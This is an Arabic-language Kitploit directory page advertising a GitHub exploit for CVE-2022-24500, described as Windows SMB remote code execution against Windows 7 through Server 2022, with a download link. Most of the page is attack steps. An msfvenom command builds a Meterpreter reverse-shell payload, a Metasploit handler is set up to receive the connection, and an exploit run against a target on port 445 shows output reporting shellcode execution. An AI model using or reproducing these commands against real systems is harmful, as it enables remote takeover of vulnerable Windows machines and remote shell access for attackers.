Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-24500 — استغلال تنفيذ التعليمات البرمجية عن بُعد في Windows SMB لـ CVE-2022-24500، توليد حمولات صدفة عكسية لـ Meterpreter وتنفيذ shellcode ضد الأنظمة الضعيفة من Windows 7 إلى Windows Server 2022. | Kitploit
أدوات/GitHubGitHub/0x7n6/cve-2022-24500
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعد
GitHub0x7n6/cve-2022-24500

CVE-2022-24500

استغلال تنفيذ التعليمات البرمجية عن بُعد في Windows SMB لـ CVE-2022-24500، توليد حمولات صدفة عكسية لـ Meterpreter وتنفيذ shellcode ضد الأنظمة الضعيفة من Windows 7 إلى Windows Server 2022.

عرض المستودع
104منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CVE-2022-24500 لتنفيذ كود عن بعد (RCE)

ثغرة تنفيذ كود عن بعد عبر SMB في ويندوز

الثغرة: ويندوز 7 - ويندوز 2022 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500

الخطوة 1

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.10.22.105 LPORT=4444 -f raw > shellcode.bin

الخطوة 2

root@kitploit:~
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.10.22.105
LHOST => 192.10.22.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

الاستغلال

CVE-2022-24500 عنوان IP والمنفذ

root@kitploit:~
C:\>CVE-2022-24500.exe 192.10.22.107 445
CVE-2022-24500 SMB Remote Exploit
[+] Checking... 192.10.22.107 445
[+] 192.10.22.107 445 IsOpen
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Try to execute shellcode!
[+] Exploit Suceess!

image

تنزيل الأداة